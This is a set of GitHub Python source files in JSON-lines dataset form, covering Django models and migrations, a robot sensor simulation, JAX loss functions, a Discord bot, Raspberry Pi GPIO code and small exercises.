1)\r\n","repo_name":"yairabraham5/Image-processing","sub_path":"ex1-yairabraham5/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23189543404","text":"\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modulector', '0020_auto_20210130_0317'),\n ]\n\n operations = [\n migrations.RunSQL(\"delete from MODULECTOR_URLTEMPLATE where name in ('quickgo', 'microrna', 'targetscan')\"),\n migrations.RunSQL(\"update MODULECTOR_URLTEMPLATE set name = 'mirbase' where name ='mirdb'\")\n\n ]\n","repo_name":"omics-datascience/modulector","sub_path":"modulector/migrations/0021_delete_url_templates.py","file_name":"0021_delete_url_templates.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"70398509804","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport uuid\n\n\nclass UserProfile(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.ForeignKey(User,on_delete=models.CASCADE)#username,email etc.\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='images/',blank=True,null=True)\n description = models.TextField(blank=True,null=True)\n birthday = models.DateField()\n\n def __str__(self):\n return str(self.user.username)\n\n\nclass Category(models.Model):\n \"\"\" Product has a category \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n \n\nclass Tag(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n \"\"\" Product has tag. For a better search operation \"\"\"\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n\nclass Product(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=1500)\n price = models.PositiveIntegerField()\n category = models.ManyToManyField(Category,related_name=\"product_categories\")\n tags = models.ManyToManyField(Tag,related_name=\"product_tags\")\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sold = models.BooleanField(default=False)\n #thumbnail = models.ImageField(upload_to=\"images/\",blank=True,null=True)\n\n def __str__(self):\n return str(self.name)\n \n def get_thumbnail(self,instance):\n images = instance.objects.filter(product=self)\n for image in images:\n if image.is_thumbnail:\n return image.image\n\n \n\n\n\nclass Comment(models.Model):\n \"\"\" Product has comment. To give an idea to users \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n comment = models.CharField(max_length=500)\n\n def __str__(self):\n return str(self.comment)[:20]\n \n\n \n\nclass Point(models.Model):\n \"\"\" Product has point that given by users \"\"\"\n user = models.OneToOneField(User,on_delete=models.PROTECT)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n value = models.PositiveSmallIntegerField(default=5, validators=[\n MaxValueValidator(5),\n MinValueValidator(1)\n ])\n\n def __str__(self):\n return f\"{self.user.username} : {self.product.name} -> {self.value}\"\n\nclass ProductImage(models.Model):\n \"\"\" Products can have multiple images \"\"\"\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n image = models.ImageField(upload_to = \"images/\")\n is_thumbnail = models.BooleanField(default=False)\n\n def __str__(self):\n return f\" image for {self.product.name}\"\n\nclass Basket(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n products = models.ManyToManyField(Product,related_name=\"products_in_basket\")\n\n def __str__(self):\n return f\"{self.user}\"\n","repo_name":"yunusarli/Flopit","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2481939544","text":"import shutil\nimport pathlib\nfrom lib.utils import rm_rf\nfrom lib.recipes import Receipt\n\n\nclass adopted(Receipt):\n depends=[\"KOS\"]\n\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n\n def build(self):\n pass\n\n def can_install(self):\n return True\n\n def install(self):\n adopted_path = pathlib.Path().joinpath(\"adopted\").resolve()\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"XyphosAerospace\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"IndicatorLightsCommunityExtensions\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"IndicatorLightsCommunityExtensions\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"NFEOutdated\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"NFEOutdated\"), target_dir)\n\n def check_installed(self):\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n return target_dir.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/adopted.py","file_name":"adopted.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38245707427","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated on Tue Sep 15 10:37:53 2020\n\n@author: Guy\n\nImplements a dynamical system of a robot (double integrator) with a range sensor measuring\nits position relative to a wall. The measurements are not Normally distributed, but characterized\nwith the \"beam model\" (see \"Probablistic Robotics\" chapter 6). The aim is to see the reachable \nsets of the system under given controls and this noise.\n\"\"\"\n\n# general stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as spi\nimport scipy.interpolate as interpolate\nfrom scipy import stats\n\n#try:\n#\tfrom pydrake.all import LinearQuadraticRegulator\n#except:\n#\t# newer version of drake\nfrom pydrake.systems.controllers import LinearQuadraticRegulator\n\n# my helper classes\nfrom map_generator import MapGenerator\n\n# some behavioral control switches\ncontinuous = False\n#'const', 'linear', 'saw', 'sine', 'square', 'file'\nMap = MapGenerator(north_type='square', south_type='saw', center_type='const')\n\n# parameters of simulation\nconst_velocity = 0.5 # in x direction [m/sec]\nm = 1.0 # robot mass [Kg]\ndt = 0.01 # integration step time [sec]\nTmax = 10 # simulation time [sec]\nmeas_max = 6.0 # max measurement of the range sensor [m]\n\n# vector of measurements\n#sensor_array = np.array([90.]) # array of angles with respect to the x axis\nsensor_array = np.array([90., -90.]) # array of angles with respect to the x axis\n#sensor_array = np.array([90., 45., -45., -90.]) # array of angles with respect to the x axis\n\n# estimator memory variables\nz_est = np.array([[0.], [0.]]) # y, y'\nu_est = 0.\n# check via matlab or place some algorithm here to calculate the gains for each (A,C)\n# A = [0 1; 0 0]\n# C = [-1/sin(a1) 0; -1/sin(a2) 0 ....]\n# p = -2*pi*1*[cosd(45)+i*sind(45), -cosd(45)-i*sind(45)]\n# L = place(A',C',p).'\n#L = np.array([[-8.89], [-39.48]]) # [+90]; w=1Hz, zeta=0.7\nL = np.array([[-4.44, 4.44], [-19.74, 19.74]]) # [+90,-90]; w=1Hz, zeta=0.7\n#L = np.array([[-2.96,-2.10,2.10,2.96], [-13.16,-9.31,9.31,13.16]]) # [+90,+45,-45,-90]; w=1Hz, zeta=0.7\n\n# wall y location with respect to x. y_dir =1 if north wall, y_dir=-1 if south\ndef wall_y_location(x, y_dir=1.):\n\tif(y_dir > 0.):\n\t\treturn Map.north_wall(x)\n\telse:\n\t\treturn Map.south_wall(x)\n\n# state z has three components: z=[x, y, y'].\ndef plant(z, t):\n\tN_sensors = sensor_array.shape[0]\n\tmeas = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\t# state feedback control (on y-position) is the distance to the wall\n\t\tideal_y = wall_y_location(z[0], y_dir=north_wall) - z[1]\n\t\tif(np.abs(sensor) <= 0.001):\n\t\t\t# case where there is a sensor heading in x direction\n\t\t\t# assume infinite wall so no wall is infront\n\t\t\tmeas[i][0] = meas_max\n\t\telse:\n\t\t\t# get the ideal ray to the wall\n\t\t\tideal_meas= ideal_y / np.sin(np.deg2rad(sensor))\n\t\t\t# get the new noise distribution (because it varies with the nominal meas.)\n\t\t\tpdf, bins = noise_dist(ideal_meas, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1)\n\t\t\t# only Gaussian noise (for debug)\n\t\t\t# pdf, bins = noise_dist(ideal_meas, a1=.3, a2=0., a3=0., a4=0., norm_sig=0.1)\n\t\t\t# sample a new measurement from the inverse cdf using a uniform random number in [0,1]\n\t\t\tmeas[i][0] = inverse_transform_sampling(pdf, bins) \n\n\t# output feedback control\n\tu = control(Map.center_line(z[0]), meas, z[0])\n\t\n\t'''\n\t# discretized\n zdot[0] = z[0] + 0 + 0 + dt * const_velocity\n zdot[1] = 0 + z[1] + dt * z[2] + dt*dt/(2.*m) * u\n\tzdot[2] = 0 + 0 + z[2] + dt/m * u\n\t'''\n\tzdot = z.copy()\n\tzdot[0] = const_velocity # x' = v_const\n\tzdot[1] = z[2] # y' = y'\n\tzdot[2] = 1./m * u # m*y'' = u\n\t\n # We return z'=[x', y', y''] and measured output y\n\treturn zdot, meas\n\n# state estimation (pole placement) + state feedback (LQR). \n#ref- y to be in. meas- the measurements vector. x- just for the wall function\ndef control(ref, meas, x):\n\tglobal z_est\n\tglobal u_est\n\tglobal L\n\t\n\t# observer gain (only for 1 measurement, if you have more, compute in matlab).\n\t#wn = 2.*np.pi*1. # 1Hz observer\n\t#xi = 0.7 # damping factor\n\t#LL = np.array([[-2.*xi*wn], [-wn*wn]]) # pole-placement\n\t\n\t# create the range estimation for each sensor\n\tN_sensors = meas.shape[0]\n\tmeas_est = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\ty_est = wall_y_location(x, y_dir=north_wall) - z_est[0][0]\n\t\tif(np.abs(sensor) < 0.001):\n\t\t\tmeas_est[i][0] = np.inf\n\t\telse:\n\t\t\tmeas_est[i][0] = y_est / np.sin(np.deg2rad(sensor))\n\t\t\n\t# Luenberger Observer\n\tf = np.array([[z_est[1][0]], \\\n\t\t\t\t [1./m * u_est] ])\n\t# Estimator equations\n\tzdot_est = f + L.dot(meas - meas_est)\n\t# Euler integration\n\tz_est = z_est + dt * zdot_est\n\t\n\t# now we can do state feedback control (x-axis doesn't really play here)\n\tAf = np.array([[0.,1.], [0.,0.]])\n\tBf = np.array([[0.], [1./m]])\n\tQ = np.eye(2)\n\tR = np.eye(1)\n\tKf, Qf = LinearQuadraticRegulator(Af, Bf, Q, R)\n\t\n\tu_est = ref - Kf.dot(z_est)[0][0]\n\t# do nothing (for debug)\n\t#u_est = 0.\n\t\n\treturn u_est\n\n# implements the noise pdf of the beam model and allows some parameters to be set\ndef noise_dist(x_true, a1=1., a2=1., a3=1., a4=.1, norm_sig=1., exp_lambda=1., uni_delta=0.5, plot=False):\n\tN = 100\n\t\n\t# the discretization of the space (bins)\n\tx = np.linspace(0, meas_max, N)\n\t# -x_true because we shift it and for some reason it looks at the truncated dist before shift :(\n\trv_norm = stats.truncnorm(-x_true, meas_max-x_true, loc=x_true, scale=norm_sig) \n\trv_exp = stats.expon()\n\trv_uni = stats.uniform()\n\t\n\t# the beam model pdf (see prob. robotics book ch. 6)\n\tpdf = a1 * rv_norm.pdf(x) + \\\n\t\t a2 * rv_exp.pdf(exp_lambda*x)*exp_lambda + \\\n\t\t a3 * rv_uni.pdf((x-0.)/meas_max)/meas_max + \\\n\t\t a4 * rv_uni.pdf((x-(meas_max-uni_delta))/uni_delta)/uni_delta\n\n\tif(plot):\n\t\t# plot the dist for debugging\n\t\tfig, ax = plt.subplots(1, 1)\n\t\tax.plot(x, pdf)\n\t\tplt.title('p(x) for the beam model')\n\t\tplt.show(block=False)\n\t\t\n\treturn pdf, x\n\n# both creates the inverse cdf and samples and returns numbers from this distribution\ndef inverse_transform_sampling(pdf, bin_edges, n_samples=1):\n\t#import pdb; pdb.set_trace()\n\t# this sort of creates the histogram by taking to adjacent pdf values and averaging them for every bin\n\tpdf = 0.5 * ( pdf[:-1] + pdf[1:] )\n\t# construct the CDF\n\tcum_values = np.zeros(bin_edges.shape)\n\tcum_values[1:] = np.cumsum(pdf*np.diff(bin_edges))\n\t# normalize to a standard distribution because it wasn't done before\n\tcum_values = cum_values/cum_values[-1] \n\t\n\tinv_cdf = interpolate.interp1d(cum_values, bin_edges)\n\t# u in [0,1]\n\tu = np.random.rand(n_samples)\n\t# return the function for later use\n\treturn inv_cdf(u)\n\ndef simulate_c():\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=Tmax.\n\tt = np.linspace(0., 10., Tmax)\n\t# The initial position is (0, 0).\n\tz0 = np.zeros(3)\n\t\n\t# We simulate the system and evaluate z\n\tz = spi.odeint(plant, z0, t, args=(k,))\n\t\n\treturn t, z\n\n# implements a standard Euler integration steps in a loop\ndef simulate_d():\n\tglobal z_est\n\tglobal u_est\n\tz_est = np.array([[0.], [0.]])\n\tu_est = 0.\n\t\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=10.\n\tt_vec = np.arange(0., Tmax, dt)\n\t# The initial position is (0, 0).\n\t#z = np.array([0., 0., 0.])\n\tz = np.array([0., 1., 0.])\n\tz_save, z_est_save, u_save, meas_save = [], [], [], []\n\t\n\tN_sensors = sensor_array.shape[0]\n\n\t# We simulate the system and evaluate z\n\tfor t in t_vec:\n\t\t# get the derivatives\n\t\tzdot, meas = plant(z, t)\n\t\t# Euler integration\n\t\tz = z + dt * zdot \n\t\t# save for telemetry\n\t\tif(len(z_save) == 0):\n\t\t\tz_save = np.array([z])\n\t\t\tz_est_save = np.array(z_est.reshape((1,2))) # only save y,y' at the moment\n\t\t\tmeas_save = np.array(meas.reshape((1,N_sensors)))\n\t\t\tu_save = np.array([u_est])\n\t\telse:\n\t\t\tz_save = np.vstack([z_save, z])\n\t\t\tmeas_save = np.vstack([meas_save, meas.reshape((1,N_sensors))])\n\t\t\tz_est_save = np.vstack([z_est_save, z_est.reshape((1,2))])\n\t\t\tu_save = np.vstack([u_save, u_est])\n\t\n\treturn t_vec, z_save, meas_save, z_est_save, u_save\n\ndef single_run():\n\tif(continuous):\n\t\tt, state = simulate_c()\n\telse:\n\t\tt, state, meas, state_est, controls = simulate_d()\n\n\t# plot the dist for debugging\n\t#pdf, bins = noise_dist(3.0, a1=.5, a2=0.1, a3=.3, a4=.04)\n\tpdf, bins = noise_dist(3.0, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1, plot=True)\n\n\t# visualizations\n\tfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n\tax1.plot(t, state[:, 1], label='$y(t)$')\n\tax1.plot(t, state_est[:, 0], label='$\\^y(t)$')\n\tax2.plot(t, controls[:], label='$u_y(t)$', alpha=0.2)\n\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0], y_dir=1.0) )\n\t\ts_wall.append( wall_y_location(state[i, 0], y_dir=-1.0 ) )\n\t\n\tfor i, sensor in enumerate(sensor_array):\n\t\tif sensor > 0.:\n\t\t\tax1.plot(t, n_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\t\telse:\n\t\t\tax1.plot(t, s_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\n\t#ax.plot([t[0], t[-1]], [3., 3.], label='north wall', color='k', linewidth=6)\n\tax1.plot(t, n_wall, label='north wall', color='k', linewidth=6)\n\t#ax.plot([t[0], t[-1]], [-3., -3.], label='south wall', color='k', linewidth=6)\n\tax1.plot(t, s_wall, label='south wall', color='k', linewidth=6)\n\tax1.legend(loc='upper right')\n\tax1.set_title('state vs. time (%d sensors)'%(len(sensor_array)))\n\tax2.legend(loc='upper right')\n\tax2.set_title('controls vs. time')\n\tax1.set_xlim(t[0], t[-1])\n\tax1.set_ylim(-np.max(np.abs(n_wall)), np.max(np.abs(n_wall)))\n\t\n\tfig, ax3 = plt.subplots(1, 1)\n\tax3.plot(state[:, 0], state[:, 1], label='$robot$')\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend(loc='upper right')\n\tax3.set_title('Robot in workspace')\n\t\n\tplt.show() #block=True)\n\t\ndef multi_run(n=10):\n\t# visualizations\n\tfig, ax3 = plt.subplots(1, 1)\n\n\tfor idx in range(n):\n\t\tt, state, meas, state_est, controls = simulate_d()\n\t\tprint('finished run #%d' %(idx))\n\t\tax3.plot(state[:, 0], state[:, 1], label='$%d$'%(idx), alpha=0.2)\n\t\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0]) )\n\t\ts_wall.append( -3. )\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend()\n\tax3.set_title('Robot in workspace')\n\n\tplt.show()\n\n\nif __name__ == \"__main__\":\n\t\n\tsingle_run()\n\t#multi_run()\n","repo_name":"sguysc/Perception_verification","sub_path":"simulate_dbl_int_in_corridor_numpy.py","file_name":"simulate_dbl_int_in_corridor_numpy.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71566940843","text":"import dataclasses\nfrom typing import List\n\nimport einops\nimport jax.numpy as jnp\n\nfrom apax.utils.math import normed_dotp\n\n\ndef weighted_squared_error(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Squared error function that allows weighting of\n individual contributions by the number of atoms in the system.\n \"\"\"\n return (label - prediction) ** 2 / divisor\n\n\ndef force_angle_loss(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function. Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n return (1.0 - dotp) / divisor\n\n\ndef force_angle_div_force_label(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n):\n \"\"\"\n Consine similarity loss function weighted by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n loss = jnp.where(F_0_norm > 1e-6, (1.0 - dotp) / F_0_norm, jnp.zeros_like(dotp))\n return loss\n\n\ndef force_angle_exponential_weight(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function exponentially scaled by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n return (1.0 - dotp) * jnp.exp(-F_0_norm) / divisor\n\n\nloss_functions = {\n \"molecules\": weighted_squared_error,\n \"structures\": weighted_squared_error,\n \"vibrations\": weighted_squared_error,\n \"cosine_sim\": force_angle_loss,\n \"cosine_sim_div_magnitude\": force_angle_div_force_label,\n \"cosine_sim_exp_magnitude\": force_angle_exponential_weight,\n}\n\n\n@dataclasses.dataclass\nclass Loss:\n \"\"\"\n Represents a single weighted loss function that is constructed from a `name`\n and a type of comparison metric.\n \"\"\"\n\n name: str\n loss_type: str\n weight: float = 1.0\n\n def __post_init__(self):\n if self.loss_type not in loss_functions.keys():\n raise NotImplementedError(\n f\"the loss function '{self.loss_type}' is not known.\"\n )\n\n if self.name not in [\"energy\", \"forces\", \"stress\"]:\n raise NotImplementedError(f\"the quantity '{self.name}' is not known.\")\n self.loss_fn = loss_functions[self.loss_type]\n\n def __call__(self, inputs: dict, prediction: dict, label: dict) -> float:\n # TODO we may want to insert an additional `mask` argument for this method\n divisor = self.determine_divisor(inputs[\"n_atoms\"])\n loss = self.loss_fn(label[self.name], prediction[self.name], divisor=divisor)\n return self.weight * jnp.sum(jnp.mean(loss, axis=0))\n\n def determine_divisor(self, n_atoms: jnp.array) -> jnp.array:\n divisor_id = self.name + \"_\" + self.loss_type\n divisor_dict = {\n \"energy_structures\": n_atoms**2,\n \"energy_vibrations\": n_atoms,\n \"forces_structures\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"cosine_sim_div_magnitude\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim_exp_magnitude\": einops.repeat(\n n_atoms, \"batch -> batch 1 1\"\n ),\n \"stress_structures\": einops.repeat(n_atoms**2, \"batch -> batch 1 1\"),\n \"stress_vibrations\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n }\n divisor = divisor_dict.get(divisor_id, jnp.array(1.0))\n\n return divisor\n\n\n@dataclasses.dataclass\nclass LossCollection:\n loss_list: List[Loss]\n\n def __call__(self, inputs: dict, predictions: dict, labels: dict) -> float:\n total_loss = 0.0\n for single_loss_fn in self.loss_list:\n loss = single_loss_fn(inputs, predictions, labels)\n total_loss = total_loss + loss\n\n return total_loss\n","repo_name":"apax-hub/apax","sub_path":"apax/train/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"18905115919","text":"# -*- coding: utf-8 -*-\r\n# Rodrigo - Prova 3, Area Inferior, 1188\r\nOperacao = str(input()) #Input da operação.\r\n\r\nsoma = 0 #Armazenará a soma dos elementos da matriz.\r\nM = [[' ']*12]*12 #Criação da matriz 12x12\r\nfor i in range(0, 12): #Dois For's que vão percorrer a matriz 12x12 e somar os elementos.\r\n for j in range(0, 12):\r\n M[i][j] = float(input())\r\n if (i >= 7) and (j <= i - 1) and (j >= 12 - i) and (i + j != 11) and (i != j): #Condição pra acessar só os elementos da área inferior.\r\n soma += M[i][j]\r\n\r\nmedia = soma / 144 #Média dos elementos da matriz.\r\n\r\nif Operacao == 'S': #Dependendo do input da operação, será impresso a soma ou a média na tela.\r\n print(f'{soma:.1f}')\r\nelif Operacao == 'M': \r\n print(f'{media:.1f}')","repo_name":"RodrigoSdeCarvalho/uri-online-judge","sub_path":"1188.py","file_name":"1188.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20900985547","text":"import nextcord\nfrom nextcord import AllowedMentions, Interaction, SlashOption, ChannelType, ApplicationCheckFailure\nfrom nextcord.ext import commands, tasks, application_checks\nimport os\nfrom dotenv import load_dotenv\nfrom cooldowns import CallableOnCooldown\nimport logging\n\nlogger = logging.getLogger('nextcord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='nextcord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\nload_dotenv()\nTOKEN = os.getenv(\"TOKEN\")\nclient = commands.Bot(owner_ids=[482232269038288916])\n\n@client.event\nasync def on_ready():\n print(\"Bot hazır\")\n print(\"-----------------\")\n await client.change_presence(activity=nextcord.Game(name='asdfg'))\n\n@client.event\nasync def on_application_command_error(inter: nextcord.Interaction, error):\n error = getattr(error, \"original\", error)\n if isinstance(error, CallableOnCooldown):\n em = nextcord.Embed(color=0xff0000, title=\"**Fazla hızlısın!** :x:\", description=f\"{error.retry_after} saniye sonra tekrar dene.\")\n await inter.send(embed=em, ephemeral=True)\n elif isinstance(error, ApplicationCheckFailure):\n em = nextcord.Embed(color=0xff0000, title=\"**Error!** :x:\", description=f\"No permissions.\")\n await inter.send(embed=em, ephemeral=True)\n else:\n raise error\n\nfor fn in os.listdir(\"./cogs\"):\n if fn.endswith(\".py\"):\n client.load_extension(f\"cogs.{fn[:-3]}\")\n else:\n pass\n\n@client.slash_command(\n name=\"cog\"\n)\n@application_checks.is_owner()\nasync def cog(interaction: nextcord.Interaction):\n pass\n@cog.subcommand()\n@application_checks.is_owner()\nasync def load(interaction: nextcord.Interaction, extension: str):\n client.load_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yüklendi!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def unload(interaction: nextcord.Interaction, extension: str):\n client.unload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog durduruldu!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def reload(interaction: nextcord.Interaction, extension: str):\n client.reload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yeniden yüklendi!\")\n\nclient.run(TOKEN)","repo_name":"JustBurakk/ahmetbot","sub_path":"ahmet-main.py","file_name":"ahmet-main.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39768941455","text":"#define two lists\r\na = [1,1,2,3,5,8,13,21,34,55,89]\r\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13]\r\n\r\n#define an empty list for storing shared values\r\nc = []\r\n\r\n#iterate through one of the lists and check for each element whether it's a shared value or not\r\n'''it checks whether the length of the list is greater than zero because we remove all elements that are\r\nequal to the current element (including that element) in order to avoid duplicates'''\r\nwhile len(a)>0:\r\n\r\n #we always take the first element because after removing the previous element we end up with the next element\r\n #being in the index 0\r\n i = a[0]\r\n\r\n #check whether it exists in the other list as well\r\n if b.count(i)>0:\r\n\r\n #add it to the list of shared elements\r\n c.append(i)\r\n\r\n #remove all values equal to i form the first list in order to avoid duplicates\r\n for j in range(a.count(i)):\r\n a.remove(i)\r\n\r\nprint(c)\r\n","repo_name":"georgead01/TA_EXAM","sub_path":"second_question.py","file_name":"second_question.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37872359720","text":"import RPi.GPIO as GPIO\nimport time\n\ndef waitForSafety():\n #pin numbers\n sensor = 21\n led = 18\n button = 15\n\n #set up all the pins\n GPIO.setmove(GPIO.BCM)\n GPIO.setup(sensor, GPIO.IN)\n GPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #required for button usage\n GPIO.setup(led, GPIO.OUT)\n\n GPIO.output(led, False) #start with LED off\n print(\"Performing safety checks...\")\n print(\" \")\n\n while True:\n if (not GPIO.input(sensor)) and GPIO.input(button) == GPIO.HIGH:\n GPIO.output(led, True)\n print('Safety checks complete. Starting in 3s.')\n time.sleep(3)\n GPIO.cleanup()\n break\n else:\n GPIO.output(led, False)","repo_name":"shreyapatill/ecehonorslab","sub_path":"RubiksSolver/sensor_led_output.py","file_name":"sensor_led_output.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38392495428","text":"from typing import List\n\nimport pytest\n\nfrom StudyNotes.TestDevelopHomework.PhaseThreeHomework.CounterDemo.Counter import CounterDemoTest\n\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n\n\n@pytest.fixture(scope=\"class\")\ndef counterBegin():\n print(\"开始计算\")\n # 实例化CounterDemo类\n counterDemoTest = CounterDemoTest()\n yield counterDemoTest\n\n print(\"计算结束\")","repo_name":"Zuoxixian/TESTDEVELOP","sub_path":"StudyNotes/TestDevelopHomework/PhaseThreeHomework/TestCounterDemo/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25921571963","text":"\"\"\"\nan example of create and get stream\n\"\"\"\n\n\nfrom streamr import Client, Option\n\n# To create or get a stream you should create a client object at first\nmy_option = Option.get_default_option()\nmy_option.api_key = 'your-api-key'\n\nmy_client = Client(my_option)\n\n# To create a new stream, you can use 'create_stream' or 'get_or_create_stream' with a 'name' parameter\n# Note that create_stream is running forcefully.\n# That means you can create two stream with same name but the stream_ids are different\n\n\nstream1 = my_client.create_stream('stream-test-1')\n\nstream2 = my_client.get_or_create_stream('stream-test-2')\n\n# To get a stream, you can use 'get_stream_by_name' or get_stream_by_id' method\n\n# get_stream_by_name will return all the streams with steam name\n# the return is a list object containing the information of all streams\nstream3 = my_client.get_stream_by_name('stream-test-2')\n\n# get stream by id will return the stream with the stream_id\n# the return is a dictionary containing the information of the stream\n# Before using this methods, you should replace the stream_id with a 32 bytes strings, which\n# can be found in the stream page, also can be obtained using the get_stream_by_name method.\nstream_id = stream2[0]['id']\nstream4 = 